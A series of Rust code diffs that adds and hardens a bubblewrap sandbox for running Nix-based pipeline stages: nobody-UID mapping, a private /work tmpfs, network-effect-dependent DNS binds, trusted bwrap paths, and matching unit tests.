+    fn policy_with_network_effect_shares_network() {
+        let effects = EffectSet::new([Effect::Pure, Effect::Network]);
+        let policy = IsolationPolicy::from_effects(&effects, PathBuf::from("/tmp/work"));
+        assert!(policy.network);
+    }
+
+    #[test]
+    fn policy_always_binds_nix_store() {
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure(), PathBuf::from("/tmp/work"));
+        let (host, sandbox) = policy
+            .ro_binds
+            .iter()
+            .find(|(_, s)| s == Path::new("/nix/store"))
+            .expect("nix store bind is missing");
+        assert_eq!(host, Path::new("/nix/store"));
+        assert_eq!(sandbox, Path::new("/nix/store"));
+    }
+
+    #[test]
+    fn bwrap_command_includes_core_flags() {
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure(), PathBuf::from("/tmp/w"));
+        let cmd = build_bwrap_command(
+            Path::new("/usr/bin/bwrap"),
+            &policy,
+            &["python3".into(), "script.py".into()],
+        );
+        let argv: Vec<String> = cmd.get_args().map(|a| a.to_string_lossy().into()).collect();
+
+        assert!(argv.contains(&"--unshare-all".to_string()));
+        assert!(argv.contains(&"--clearenv".to_string()));
+        assert!(argv.contains(&"--cap-drop".to_string()));
+        assert!(argv.contains(&"ALL".to_string()));
+        assert!(argv.contains(&"--die-with-parent".to_string()));
+        // No --share-net when no Network effect.
+        assert!(!argv.contains(&"--share-net".to_string()));
+        // Inner command appended after --.
+        let dash_dash_idx = argv
+            .iter()
+            .position(|a| a == "--")
+            .expect("missing -- separator");
+        assert_eq!(argv[dash_dash_idx + 1], "python3");
+    }
+
+    #[test]
+    fn bwrap_command_adds_share_net_for_network_effect() {
+        let policy = IsolationPolicy::from_effects(
+            &EffectSet::new([Effect::Pure, Effect::Network]),
+            PathBuf::from("/tmp/w"),
+        );
+        let cmd = build_bwrap_command(
+            Path::new("/usr/bin/bwrap"),
+            &policy,
+            &["curl".into(), "https://example.com".into()],
+        );
+        let argv: Vec<String> = cmd.get_args().map(|a| a.to_string_lossy().into()).collect();
+        assert!(argv.contains(&"--share-net".to_string()));
+    }
+
+    #[test]
+    fn effectiveness_predicate_matches_variant() {
+        assert!(!IsolationBackend::None.is_effective());
+        assert!(IsolationBackend::Bwrap {
+            bwrap_path: PathBuf::from("/usr/bin/bwrap"),
+        }
+        .is_effective());
+    }
+}

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -21,10 +21,27 @@
 //! ## Policy derivation
 //!
 //! An [`IsolationPolicy`] is derived from a stage's declared
-//! `EffectSet`: stages without `Effect::Network` get a fresh empty
-//! network namespace; all stages get read-only `/nix/store` and a
-//! per-invocation `/work` tmpdir. Host capabilities are dropped;
-//! the host's HOME, SSH keys, and credentials files are unreachable.
+//! `EffectSet`. Phase 1 surfaces exactly one axis from the effect
+//! vocabulary — `Effect::Network` toggles whether the sandbox
+//! inherits the host's network namespace. Every other effect
+//! variant (`Pure`, `Fallible`, `Llm`, `NonDeterministic`, `Process`,
+//! `Cost`, `Unknown`) produces the same baseline policy: RO
+//! `/nix/store` bind, a sandbox-private `/work` tmpfs,
+//! `--cap-drop ALL`, UID/GID mapped to nobody, `--clearenv` with a
+//! short allowlist.
+//!
+//! ### Filesystem effects — not yet expressible
+//!
+//! The v0.6 `Effect` enum has no `FsRead(path)` / `FsWrite(path)`
+//! variants, so there is no way for a stage to declare "I need to
+//! read `/etc/ssl` but nothing else." The sandbox compensates by
+//! allowing *nothing* outside `/nix/store`, the executor's cache
+//! dir, and the nix binary. That is the strictest sane default —
+//! but it means stages that legitimately need a specific host path
+//! cannot run under isolation today. Planned for v0.8: extend
+//! `Effect` with `FsRead` / `FsWrite` path variants, then expand
+//! `from_effects` to translate them into bind mounts. Tracked in
+//! `docs/roadmap/2026-04-18-stage-isolation.md`.
 
 use noether_core::effects::{Effect, EffectSet};
 use std::path::{Path, PathBuf};

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -105,9 +105,9 @@ impl IsolationBackend {
     }
 }
 
-/// Error from the isolation layer itself — policy misconfiguration,
-/// backend unavailable, bwrap spawn failure. Stage-body errors come
-/// back as the usual `ExecutionError` on the inner command.
+/// Error from the isolation layer itself — policy misconfiguration
+/// or backend unavailable. Stage-body errors come back as the usual
+/// `ExecutionError` on the inner command.
 #[derive(Debug, Clone, PartialEq, thiserror::Error)]
 pub enum IsolationError {
     #[error("isolation backend '{name}' is not recognised; expected one of: auto, bwrap, none")]
@@ -115,9 +115,6 @@ pub enum IsolationError {
 
     #[error("isolation backend '{backend}' is unavailable: {reason}")]
     BackendUnavailable { backend: String, reason: String },
-
-    #[error("failed to create work directory: {path} ({reason})")]
-    WorkDirCreate { path: String, reason: String },
 }
 
 /// What the sandbox does and doesn't let a stage reach.
@@ -173,10 +170,13 @@ impl IsolationPolicy {
                 "HOME".into(),
                 "USER".into(),
                 "LANG".into(),
+                "LC_ALL".into(),
+                "LC_CTYPE".into(),
                 "NIX_PATH".into(),
                 "NIX_SSL_CERT_FILE".into(),
                 "SSL_CERT_FILE".into(),
                 "NOETHER_LOG_LEVEL".into(),
+                "RUST_LOG".into(),
             ],
         }
     }
@@ -248,6 +248,27 @@ pub fn build_bwrap_command(
 
     if policy.network {
         c.arg("--share-net");
+        // `--share-net` re-enters the host network namespace but the
+        // sandbox rootfs is otherwise empty. glibc NSS resolves DNS
+        // through `/etc/resolv.conf`, `/etc/nsswitch.conf`, and
+        // `/etc/hosts`; without those, even a correctly networked
+        // sandbox can't resolve hostnames. `--ro-bind-try` is a
+        // no-op when the source is absent (e.g. NixOS systems that
+        // route DNS differently), so it's safe to emit regardless.
+        //
+        // `/etc/ssl/certs` covers non-Nix-aware clients (curl,
+        // openssl, etc.) that expect the system trust store.
+        // Nix-built code uses `NIX_SSL_CERT_FILE` / `SSL_CERT_FILE`
+        // (already in the env allowlist) to point into `/nix/store`,
+        // which is bound separately.
+        for etc_path in [
+            "/etc/resolv.conf",
+            "/etc/hosts",
+            "/etc/nsswitch.conf",
+            "/etc/ssl/certs",
+        ] {
+            c.arg("--ro-bind-try").arg(etc_path).arg(etc_path);
+        }
     }
 
     for (host, sandbox) in &policy.ro_binds {
@@ -344,14 +365,16 @@ static PATH_FALLBACK_WARNED: AtomicBool = AtomicBool::new(false);
 /// profile, then distro-packaged `/usr/bin`, then manual installs.
 ///
 /// A non-root attacker can't write to any of these on a standard
-/// system, so resolving through them short-circuits the `$PATH`
-/// planting vector.
+/// Linux system, so resolving through them short-circuits the
+/// `$PATH` planting vector. Linux-only: bwrap doesn't run on macOS
+/// or Windows, and typical macOS install paths (e.g. `/opt/homebrew`)
+/// are owned by the installing admin user, not root, so including
+/// them here would re-introduce the planting vector we're closing.
 pub(crate) const TRUSTED_BWRAP_PATHS: &[&str] = &[
     "/run/current-system/sw/bin/bwrap",
     "/nix/var/nix/profiles/default/bin/bwrap",
     "/usr/bin/bwrap",
     "/usr/local/bin/bwrap",
-    "/opt/homebrew/bin/bwrap",
 ];
 
 #[cfg(test)]
@@ -487,22 +510,22 @@ mod tests {
     }
 
     #[test]
-    fn trusted_bwrap_paths_are_all_root_owned_locations() {
-        // This is a compile-time contract check: every entry in
-        // TRUSTED_BWRAP_PATHS must point at a directory that is
-        // conventionally root-owned on mainstream Linux hosts. If
-        // someone adds a user-writable path here (e.g. `~/.local/bin`)
-        // they re-introduce the vector `find_bwrap` was written to
-        // close. Keep it literal and reviewable — no interpolation.
+    fn trusted_bwrap_paths_are_root_owned_on_linux() {
+        // Contract check: every entry in TRUSTED_BWRAP_PATHS must
+        // point at a directory that is conventionally root-owned on
+        // mainstream Linux hosts. If someone adds a user-writable
+        // path here (e.g. `~/.local/bin`, or `/opt/homebrew` which
+        // is admin-user-owned on macOS) they re-introduce the
+        // planting vector `find_bwrap` was written to close. bwrap
+        // is Linux-only, so macOS-adjacent paths don't belong in
+        // the list. Keep it literal and reviewable — no
+        // interpolation, no platform branching at runtime.
         for p in TRUSTED_BWRAP_PATHS {
             assert!(
-                p.starts_with("/run/")
-                    || p.starts_with("/nix/var/")
-                    || p.starts_with("/usr/")
-                    || p.starts_with("/opt/"),
-                "TRUSTED_BWRAP_PATHS entry '{p}' looks user-writable; \
-                 anything outside /run /nix/var /usr /opt is not a \
-                 standard root-owned location"
+                p.starts_with("/run/") || p.starts_with("/nix/var/") || p.starts_with("/usr/"),
+                "TRUSTED_BWRAP_PATHS entry '{p}' is not conventionally \
+                 root-owned on Linux; only /run /nix/var /usr prefixes \
+                 are permitted"
             );
         }
     }

--- a/crates/noether-engine/src/executor/isolation.rs
+++ b/crates/noether-engine/src/executor/isolation.rs
@@ -115,9 +115,19 @@ pub struct IsolationPolicy {
     /// includes `/nix/store` so Nix-pinned runtimes resolve inside
     /// the sandbox.
     pub ro_binds: Vec<(PathBuf, PathBuf)>,
-    /// The stage's scratch directory. Bind-mounted read-write at the
-    /// sandbox path. Cleaned up after the stage exits.
-    pub work_bind: (PathBuf, PathBuf),
+    /// Scratch directory strategy for `/work` inside the sandbox.
+    ///
+    /// - `None` (recommended, and the default from [`Self::from_effects`])
+    ///   → `bwrap` creates `/work` as a sandbox-private tmpfs via
+    ///   `--dir /work`. No host-side path exists; cleanup happens
+    ///   automatically when the sandbox exits; a malicious host user
+    ///   can't race to write predicatable filenames into the work
+    ///   dir before the stage runs.
+    /// - `Some(host)` → `--bind <host> /work`. Host dir must exist
+    ///   and be writable by the sandbox's effective UID (65534 by
+    ///   default). Only for callers that need to inspect the work
+    ///   dir after execution — e.g., an integration test.
+    pub work_host: Option<PathBuf>,
     /// Inherit the host's network namespace (`true`) or unshare into
     /// a fresh empty one (`false`). Only `true` when the stage has
     /// `Effect::Network`.
@@ -131,15 +141,14 @@ pub struct IsolationPolicy {
 impl IsolationPolicy {
     /// Build the policy for a stage with the given effects.
     ///
-    /// `work_host` is the host-side tmpdir to bind-mount as `/work`
-    /// inside the sandbox. Callers pick this (typically a per-run
-    /// tmp). The policy takes ownership of the paths but not the
-    /// tmpdir lifetime — the caller is responsible for cleanup.
-    pub fn from_effects(effects: &EffectSet, work_host: PathBuf) -> Self {
+    /// Defaults to a sandbox-private `/work` (tmpfs, no host-side
+    /// state). Callers that need a host-visible work dir can swap in
+    /// [`Self::with_work_host`].
+    pub fn from_effects(effects: &EffectSet) -> Self {
         let has_network = effects.iter().any(|e| matches!(e, Effect::Network));
         Self {
             ro_binds: vec![(PathBuf::from("/nix/store"), PathBuf::from("/nix/store"))],
-            work_bind: (work_host, PathBuf::from("/work")),
+            work_host: None,
             network: has_network,
             env_allowlist: vec![
                 "PATH".into(),
@@ -153,7 +162,22 @@ impl IsolationPolicy {
             ],
         }
     }
+
+    /// Override the sandbox's `/work` to bind a caller-provided host
+    /// directory. The directory must already exist and be writable by
+    /// the sandbox effective UID (65534). Consumers mostly leave the
+    /// default (tmpfs).
+    pub fn with_work_host(mut self, host: PathBuf) -> Self {
+        self.work_host = Some(host);
+        self
+    }
 }
+
+/// Conventional "nobody" UID/GID on Linux. bwrap maps the invoking
+/// user to this identity inside the sandbox so the stage cannot
+/// observe the real UID of the caller.
+pub(crate) const NOBODY_UID: u32 = 65534;
+pub(crate) const NOBODY_GID: u32 = 65534;
 
 /// Build a `bwrap` invocation that runs `cmd` inside a sandbox.
 ///
@@ -166,6 +190,11 @@ impl IsolationPolicy {
 /// - `--unshare-all` — fresh user, pid, uts, ipc, mount, cgroup
 ///   namespaces. Network namespace is unshared too, unless the
 ///   policy re-shares via `--share-net` (see below).
+/// - `--uid 65534 --gid 65534` — map the invoking user to
+///   `nobody/nogroup` inside the sandbox. Without this, the stage
+///   would observe the host user's real UID (informational leak,
+///   and potentially exploitable when combined with filesystem
+///   bind-mount misconfiguration).
 /// - `--die-with-parent` — if the parent dies, so does the sandbox.
 /// - `--proc /proc`, `--dev /dev` — standard Linux mounts.
 /// - `--ro-bind <host> <sandbox>` — read-only mounts from the
@@ -185,6 +214,10 @@ pub fn build_bwrap_command(
     c.arg("--unshare-all")
         .arg("--die-with-parent")
         .arg("--new-session")
+        .arg("--uid")
+        .arg(NOBODY_UID.to_string())
+        .arg("--gid")
+        .arg(NOBODY_GID.to_string())
         .arg("--proc")
         .arg("/proc")
         .arg("--dev")
@@ -203,11 +236,18 @@ pub fn build_bwrap_command(
         c.arg("--ro-bind").arg(host).arg(sandbox);
     }
 
-    c.arg("--bind")
-        .arg(&policy.work_bind.0)
-        .arg(&policy.work_bind.1)
-        .arg("--chdir")
-        .arg(&policy.work_bind.1);
+    match &policy.work_host {
+        Some(host) => {
+            c.arg("--bind").arg(host).arg("/work");
+        }
+        None => {
+            // Sandbox-private tmpfs at /work. No host-side path,
+            // so nothing to clean up and nothing for a host-side
+            // attacker to race into before the sandbox starts.
+            c.arg("--dir").arg("/work");
+        }
+    }
+    c.arg("--chdir").arg("/work");
 
     c.arg("--").args(inner_cmd);
     c
@@ -242,20 +282,32 @@ mod tests {
     #[test]
     fn policy_without_network_effect_isolates_network() {
         let effects = EffectSet::pure();
-        let policy = IsolationPolicy::from_effects(&effects, PathBuf::from("/tmp/work"));
+        let policy = IsolationPolicy::from_effects(&effects);
         assert!(!policy.network);
     }
 
     #[test]
     fn policy_with_network_effect_shares_network() {
         let effects = EffectSet::new([Effect::Pure, Effect::Network]);
-        let policy = IsolationPolicy::from_effects(&effects, PathBuf::from("/tmp/work"));
+        let policy = IsolationPolicy::from_effects(&effects);
         assert!(policy.network);
     }
 
     #[test]
+    fn policy_defaults_to_sandbox_private_work() {
+        // New default after the v0.7 hardening: no host-side workdir.
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+        assert!(
+            policy.work_host.is_none(),
+            "from_effects must default to sandbox-private /work; \
+             callers asking for host-visible scratch must opt in via \
+             .with_work_host(...)"
+        );
+    }
+
+    #[test]
     fn policy_always_binds_nix_store() {
-        let policy = IsolationPolicy::from_effects(&EffectSet::pure(), PathBuf::from("/tmp/work"));
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure());
         let (host, sandbox) = policy
             .ro_binds
             .iter()
@@ -267,7 +319,7 @@ mod tests {
 
     #[test]
     fn bwrap_command_includes_core_flags() {
-        let policy = IsolationPolicy::from_effects(&EffectSet::pure(), PathBuf::from("/tmp/w"));
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure());
         let cmd = build_bwrap_command(
             Path::new("/usr/bin/bwrap"),
             &policy,
@@ -282,6 +334,9 @@ mod tests {
         assert!(argv.contains(&"--die-with-parent".to_string()));
         // No --share-net when no Network effect.
         assert!(!argv.contains(&"--share-net".to_string()));
+        // Default workdir is sandbox-private tmpfs, not a host bind.
+        assert!(argv.contains(&"--dir".to_string()));
+        assert!(argv.contains(&"/work".to_string()));
         // Inner command appended after --.
         let dash_dash_idx = argv
             .iter()
@@ -291,11 +346,25 @@ mod tests {
     }
 
     #[test]
+    fn bwrap_command_uses_host_bind_when_work_host_set() {
+        // Integration tests and debugging tools can still opt into a
+        // host-visible work dir via `with_work_host`.
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure())
+            .with_work_host(PathBuf::from("/tmp/inspect-me"));
+        let cmd = build_bwrap_command(Path::new("/usr/bin/bwrap"), &policy, &["python3".into()]);
+        let argv: Vec<String> = cmd.get_args().map(|a| a.to_string_lossy().into()).collect();
+        let bind_pos = argv
+            .iter()
+            .position(|a| a == "--bind")
+            .expect("--bind missing");
+        assert_eq!(argv[bind_pos + 1], "/tmp/inspect-me");
+        assert_eq!(argv[bind_pos + 2], "/work");
+    }
+
+    #[test]
     fn bwrap_command_adds_share_net_for_network_effect() {
-        let policy = IsolationPolicy::from_effects(
-            &EffectSet::new([Effect::Pure, Effect::Network]),
-            PathBuf::from("/tmp/w"),
-        );
+        let policy =
+            IsolationPolicy::from_effects(&EffectSet::new([Effect::Pure, Effect::Network]));
         let cmd = build_bwrap_command(
             Path::new("/usr/bin/bwrap"),
             &policy,
@@ -303,6 +372,29 @@ mod tests {
         );
         let argv: Vec<String> = cmd.get_args().map(|a| a.to_string_lossy().into()).collect();
         assert!(argv.contains(&"--share-net".to_string()));
+    }
+
+    #[test]
+    fn bwrap_command_maps_to_nobody_uid_and_gid() {
+        // Regression guard: the sandbox must not surface the invoking
+        // user's real UID. Without `--uid 65534 --gid 65534` a stage
+        // can call `os.getuid()` / `id` and observe the host user —
+        // that's both an info leak and a stepping stone when combined
+        // with any bind-mount misconfiguration.
+        let policy = IsolationPolicy::from_effects(&EffectSet::pure());
+        let cmd = build_bwrap_command(Path::new("/usr/bin/bwrap"), &policy, &["python3".into()]);
+        let argv: Vec<String> = cmd.get_args().map(|a| a.to_string_lossy().into()).collect();
+
+        let uid_pos = argv
+            .iter()
+            .position(|a| a == "--uid")
+            .expect("--uid missing");
+        assert_eq!(argv[uid_pos + 1], "65534");
+        let gid_pos = argv
+            .iter()
+            .position(|a| a == "--gid")
+            .expect("--gid missing");
+        assert_eq!(argv[gid_pos + 1], "65534");
     }
 
     #[test]

--- a/crates/noether-engine/src/executor/mod.rs
+++ b/crates/noether-engine/src/executor/mod.rs
@@ -2,6 +2,8 @@
 #[cfg(feature = "native")]
 pub mod composite;
 #[cfg(feature = "native")]
+pub mod isolation;
+#[cfg(feature = "native")]
 pub mod nix;
 #[cfg(feature = "native")]
 pub mod runtime;

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -373,19 +373,46 @@ impl NixExecutor {
                 policy
                     .ro_binds
                     .push((self.cache_dir.to_path_buf(), self.cache_dir.to_path_buf()));
-                // Bind only the nix executable itself, not its parent
-                // directory. Binding the parent on a distro install
-                // (e.g. `/usr/bin`) would expose `sudo`, `curl`, and
-                // any other suid-or-sensitive system binary. Single
-                // file bind: `bwrap` creates the intermediate dir
-                // scaffolding automatically.
-                if self.nix_bin.is_file()
-                    && !self.nix_bin.starts_with("/nix/store")
+                // Nix binary visibility inside the sandbox has three cases:
+                //
+                // 1. `nix_bin` is under `/nix/store` — covered by the
+                //    default `/nix/store` bind. Nothing to add.
+                // 2. `nix_bin` is under `cache_dir` — covered by the
+                //    `cache_dir` bind above. Nothing to add.
+                // 3. `nix_bin` is a distro-packaged install (e.g.
+                //    `/usr/bin/nix`, `/usr/local/bin/nix`). The
+                //    binary is dynamically linked against glibc,
+                //    libcrypto, and readline living in `/usr/lib*`.
+                //    Binding just the nix executable file would let
+                //    the sandbox exec it but immediately fail
+                //    resolving `ld-linux-x86-64.so.2` — the kernel
+                //    can't find the dynamic loader.
+                //
+                //    Widening the bind set to include `/usr/lib*`
+                //    re-exposes the full suid-binary surface the
+                //    hardening closed. Instead: refuse to run, with
+                //    a clear message pointing the operator at the
+                //    Nix-native install path. The trust model here
+                //    is "nix belongs to the same reproducibility
+                //    boundary as the stages it dispatches;" a
+                //    distro-packaged nix violates that boundary
+                //    anyway.
+                if !self.nix_bin.starts_with("/nix/store")
                     && !self.nix_bin.starts_with(&self.cache_dir)
                 {
-                    policy
-                        .ro_binds
-                        .push((self.nix_bin.clone(), self.nix_bin.clone()));
+                    return Err(ExecutionError::StageFailed {
+                        stage_id: stage_id.clone(),
+                        message: format!(
+                            "stage isolation is enabled but nix is installed at \
+                             {} (outside /nix/store). A distro-packaged nix is \
+                             dynamically linked against host libraries; binding \
+                             those into the sandbox would defeat isolation. \
+                             Install nix via the Determinate / upstream \
+                             installer (places nix under /nix/store) or pass \
+                             --isolate=none to run without the sandbox.",
+                            self.nix_bin.display()
+                        ),
+                    });
                 }
                 // `build_bwrap_command` emits `--setenv` args for
                 // the sandbox's env allowlist (HOME=/work,

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -69,6 +69,12 @@ pub struct NixConfig {
     /// Maximum number of bytes captured from stderr (for error messages).
     /// Default: 64 KiB.
     pub max_stderr_bytes: usize,
+    /// Isolation backend to wrap each stage subprocess in. When set
+    /// to [`super::isolation::IsolationBackend::None`] (the default
+    /// for back-compat), stages run with full host-user privileges
+    /// — see SECURITY.md. Set via
+    /// [`NixConfig::with_isolation`] or the CLI `--isolate` flag.
+    pub isolation: super::isolation::IsolationBackend,
 }
 
 impl Default for NixConfig {
@@ -77,17 +83,29 @@ impl Default for NixConfig {
             timeout_secs: 30,
             max_output_bytes: 10 * 1024 * 1024,
             max_stderr_bytes: 64 * 1024,
+            isolation: super::isolation::IsolationBackend::None,
         }
+    }
+}
+
+impl NixConfig {
+    /// Set the isolation backend. Returns `self` for chaining.
+    pub fn with_isolation(mut self, backend: super::isolation::IsolationBackend) -> Self {
+        self.isolation = backend;
+        self
     }
 }
 
 // ── Internal stage storage ───────────────────────────────────────────────────
 
-/// Maps stage IDs to their implementation (source code + language tag).
+/// Maps stage IDs to their implementation (source code + language tag +
+/// declared effects — needed so the isolation layer can derive a
+/// policy).
 #[derive(Clone)]
 struct StageImpl {
     code: String,
     language: String,
+    effects: noether_core::effects::EffectSet,
 }
 
 // ── NixExecutor ──────────────────────────────────────────────────────────────
@@ -165,6 +183,7 @@ impl NixExecutor {
                     StageImpl {
                         code: code.clone(),
                         language: lang.clone(),
+                        effects: stage.signature.effects.clone(),
                     },
                 );
             }
@@ -179,12 +198,54 @@ impl NixExecutor {
     }
 
     /// Register an in-memory synthesized stage without re-querying the store.
+    ///
+    /// The registered stage has no declared effects; the isolation
+    /// policy therefore defaults to a pure/no-network sandbox. Callers
+    /// that need network or filesystem effects should add the stage via
+    /// the store (which carries the declared `EffectSet`) or use
+    /// [`Self::register_with_effects`].
     pub fn register(&mut self, stage_id: &StageId, code: &str, language: &str) {
         self.implementations.insert(
             stage_id.0.clone(),
             StageImpl {
                 code: code.into(),
                 language: language.into(),
+                effects: noether_core::effects::EffectSet::pure(),
+            },
+        );
+    }
+
+    /// Clone the current config (minus the implementations map) for
+    /// callers that want to rebuild with different knobs.
+    pub fn config_snapshot(&self) -> NixConfig {
+        self.config.clone()
+    }
+
+    /// Rebuild a NixExecutor with a replacement config, preserving
+    /// its registered implementations. Returns `Some(..)` or `None`
+    /// when reconstruction fails — today it can't fail, but the
+    /// Option keeps the API forward-compatible.
+    pub fn rebuild_with_config(mut self, config: NixConfig) -> Option<Self> {
+        self.config = config;
+        Some(self)
+    }
+
+    /// Register a stage with explicit declared effects. Used by tests
+    /// and by callers that want to drive the isolation policy without
+    /// going through the full StageStore.
+    pub fn register_with_effects(
+        &mut self,
+        stage_id: &StageId,
+        code: &str,
+        language: &str,
+        effects: noether_core::effects::EffectSet,
+    ) {
+        self.implementations.insert(
+            stage_id.0.clone(),
+            StageImpl {
+                code: code.into(),
+                language: language.into(),
+                effects,
             },
         );
     }
@@ -292,28 +353,90 @@ impl NixExecutor {
 
         let (nix_subcommand, args) = self.build_nix_command(language, script, code);
 
-        // __direct__ means run the binary directly (venv Python), not via nix
-        let mut child = if nix_subcommand == "__direct__" {
-            Command::new(&args[0])
-                .args(&args[1..])
-                .stdin(Stdio::piped())
-                .stdout(Stdio::piped())
-                .stderr(Stdio::piped())
-                .spawn()
+        // Build the full argv — either raw (no isolation) or wrapped in
+        // `bwrap` when an isolation backend is configured. The wrapped
+        // command spawns bwrap which execs the inner command inside a
+        // fresh sandbox.
+        let raw_argv: Vec<String> = if nix_subcommand == "__direct__" {
+            args.clone()
         } else {
-            Command::new(&self.nix_bin)
-                .arg(&nix_subcommand)
-                .args(["--no-write-lock-file", "--quiet"])
-                .args(&args)
-                .stdin(Stdio::piped())
-                .stdout(Stdio::piped())
-                .stderr(Stdio::piped())
-                .spawn()
-        }
-        .map_err(|e| ExecutionError::StageFailed {
-            stage_id: stage_id.clone(),
-            message: format!("failed to spawn process: {e}"),
-        })?;
+            let mut v = vec![self.nix_bin.display().to_string(), nix_subcommand.clone()];
+            v.push("--no-write-lock-file".into());
+            v.push("--quiet".into());
+            v.extend(args.iter().cloned());
+            v
+        };
+
+        // Scratch work dir used as /work inside the sandbox. Must exist
+        // before bwrap spawns. Reuse a per-executor tmpdir; each stage
+        // invocation gets its own uniquely-named subdirectory so cross-
+        // stage filesystem collisions can't happen.
+        let work_host =
+            self.cache_dir
+                .join("work")
+                .join(format!("{}-{}", stage_id.0, std::process::id()));
+        let _ = std::fs::create_dir_all(&work_host);
+
+        let mut spawn = match &self.config.isolation {
+            super::isolation::IsolationBackend::None => {
+                // No sandbox — legacy behaviour.
+                let mut cmd = Command::new(&raw_argv[0]);
+                cmd.args(&raw_argv[1..]);
+                cmd
+            }
+            super::isolation::IsolationBackend::Bwrap { bwrap_path } => {
+                let policy = super::isolation::IsolationPolicy::from_effects(
+                    self.implementations
+                        .get(&stage_id.0)
+                        .map(|i| &i.effects)
+                        .unwrap_or(&noether_core::effects::EffectSet::pure()),
+                    work_host.clone(),
+                );
+                // Prepend the Nix binary to the ro_binds so the
+                // sandboxed process can invoke it. NixExecutor resolves
+                // `nix` at construction time from the host PATH; the
+                // bwrap sandbox doesn't inherit PATH, so we bind-mount
+                // the resolved path's parent directory read-only.
+                let mut policy = policy;
+                if let Some(parent) = self.nix_bin.parent() {
+                    policy
+                        .ro_binds
+                        .push((parent.to_path_buf(), parent.to_path_buf()));
+                }
+                // Rewrite the argv: the nix_bin inside the sandbox is
+                // at its real path (bind-mounted), so the absolute path
+                // in raw_argv[0] works. For `__direct__`, the first arg
+                // is typically a venv-installed Python binary at some
+                // arbitrary path — we bind-mount its parent dir so
+                // that resolves too.
+                if nix_subcommand == "__direct__" {
+                    if let Some(parent) = std::path::Path::new(&raw_argv[0]).parent() {
+                        policy
+                            .ro_binds
+                            .push((parent.to_path_buf(), parent.to_path_buf()));
+                    }
+                }
+                let mut cmd = super::isolation::build_bwrap_command(bwrap_path, &policy, &raw_argv);
+                // Pass through allowlisted env vars.
+                for var in &policy.env_allowlist {
+                    if let Ok(v) = std::env::var(var) {
+                        cmd.env(var, v);
+                    }
+                }
+                cmd
+            }
+        };
+
+        let mut child = spawn
+            .stdin(Stdio::piped())
+            .stdout(Stdio::piped())
+            .stderr(Stdio::piped())
+            .spawn()
+            .map_err(|e| ExecutionError::StageFailed {
+                stage_id: stage_id.clone(),
+                message: format!("failed to spawn process: {e}"),
+            })?;
+        let _ = raw_argv;
 
         // Write stdin in a background thread so we don't deadlock when the
         // child's stdin pipe fills before we start reading stdout.
@@ -1042,6 +1165,7 @@ mod tests {
                     StageImpl {
                         code: code.into(),
                         language: "python".into(),
+                        effects: noether_core::effects::EffectSet::pure(),
                     },
                 );
                 m
@@ -1085,6 +1209,7 @@ mod tests {
                     StageImpl {
                         code: code.into(),
                         language: "python".into(),
+                        effects: noether_core::effects::EffectSet::pure(),
                     },
                 );
                 m

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -387,14 +387,10 @@ impl NixExecutor {
                         .ro_binds
                         .push((self.nix_bin.clone(), self.nix_bin.clone()));
                 }
-                let mut cmd = super::isolation::build_bwrap_command(bwrap_path, &policy, &raw_argv);
-                // Pass through allowlisted env vars.
-                for var in &policy.env_allowlist {
-                    if let Ok(v) = std::env::var(var) {
-                        cmd.env(var, v);
-                    }
-                }
-                cmd
+                // `build_bwrap_command` emits `--setenv` args for
+                // the sandbox's env allowlist (HOME=/work,
+                // USER=nobody, + inherited). Nothing else to do here.
+                super::isolation::build_bwrap_command(bwrap_path, &policy, &raw_argv)
             }
         };
 

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -367,16 +367,6 @@ impl NixExecutor {
             v
         };
 
-        // Scratch work dir used as /work inside the sandbox. Must exist
-        // before bwrap spawns. Reuse a per-executor tmpdir; each stage
-        // invocation gets its own uniquely-named subdirectory so cross-
-        // stage filesystem collisions can't happen.
-        let work_host =
-            self.cache_dir
-                .join("work")
-                .join(format!("{}-{}", stage_id.0, std::process::id()));
-        let _ = std::fs::create_dir_all(&work_host);
-
         let mut spawn = match &self.config.isolation {
             super::isolation::IsolationBackend::None => {
                 // No sandbox — legacy behaviour.
@@ -385,36 +375,35 @@ impl NixExecutor {
                 cmd
             }
             super::isolation::IsolationBackend::Bwrap { bwrap_path } => {
-                let policy = super::isolation::IsolationPolicy::from_effects(
+                // /work is a sandbox-private tmpfs (set by
+                // `IsolationPolicy::from_effects` default) — no host-side
+                // tmpdir to manage, no cleanup, no race.
+                let mut policy = super::isolation::IsolationPolicy::from_effects(
                     self.implementations
                         .get(&stage_id.0)
                         .map(|i| &i.effects)
                         .unwrap_or(&noether_core::effects::EffectSet::pure()),
-                    work_host.clone(),
                 );
-                // Prepend the Nix binary to the ro_binds so the
-                // sandboxed process can invoke it. NixExecutor resolves
-                // `nix` at construction time from the host PATH; the
-                // bwrap sandbox doesn't inherit PATH, so we bind-mount
-                // the resolved path's parent directory read-only.
-                let mut policy = policy;
-                if let Some(parent) = self.nix_bin.parent() {
+                // Expose the stage-script cache (where this invocation's
+                // wrapped `.py` / `.sh` / `.js` file lives). Scoped to
+                // `cache_dir` so the sandbox sees noether's own
+                // workspace and nothing else from the host user's home.
+                policy
+                    .ro_binds
+                    .push((self.cache_dir.to_path_buf(), self.cache_dir.to_path_buf()));
+                // Bind only the nix executable itself, not its parent
+                // directory. Binding the parent on a distro install
+                // (e.g. `/usr/bin`) would expose `sudo`, `curl`, and
+                // any other suid-or-sensitive system binary. Single
+                // file bind: `bwrap` creates the intermediate dir
+                // scaffolding automatically.
+                if self.nix_bin.is_file()
+                    && !self.nix_bin.starts_with("/nix/store")
+                    && !self.nix_bin.starts_with(&self.cache_dir)
+                {
                     policy
                         .ro_binds
-                        .push((parent.to_path_buf(), parent.to_path_buf()));
-                }
-                // Rewrite the argv: the nix_bin inside the sandbox is
-                // at its real path (bind-mounted), so the absolute path
